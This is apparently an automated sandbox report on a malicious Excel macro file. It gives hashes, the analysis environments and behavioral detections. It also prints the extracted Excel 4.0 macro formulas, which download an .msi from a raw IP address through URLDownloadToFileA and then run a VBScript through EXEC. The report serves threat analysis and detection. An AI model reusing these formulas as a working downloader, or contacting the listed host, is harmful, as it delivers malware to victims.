General
-
Target
2344185e02a96521e5ac17dbb8a55925
-
Size
6KB
-
Sample
231221-3bdcjscba5
-
MD5
2344185e02a96521e5ac17dbb8a55925
-
SHA1
2940d4d487805f44cdc9b0913bdc87eb0aafb5fb
-
SHA256
da20d944dd67217f92a665fa9941e8df2635a18fe1d2e13b3a19ab6831dd0b6f
-
SHA512
645ed27415956266fb3833d9f08ae66fcb468ec1d3c4613efadb9c0a48651e20c68b20207dd19d4eb47f2e708f7e601d098990f0d23e67a86e6dc5bcfa172bf2
-
SSDEEP
192:NDSkuSGbrA2OmmfRh8UhHFBFYuvb98y6Vn8pn++Dn2znRW:NHu3M2wj1FYab98y6Vn8pnXn2znRW
Static task
static1
Behavioral task
behavioral1
Sample
2344185e02a96521e5ac17dbb8a55925.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2344185e02a96521e5ac17dbb8a55925.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
-
-
Target
2344185e02a96521e5ac17dbb8a55925
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-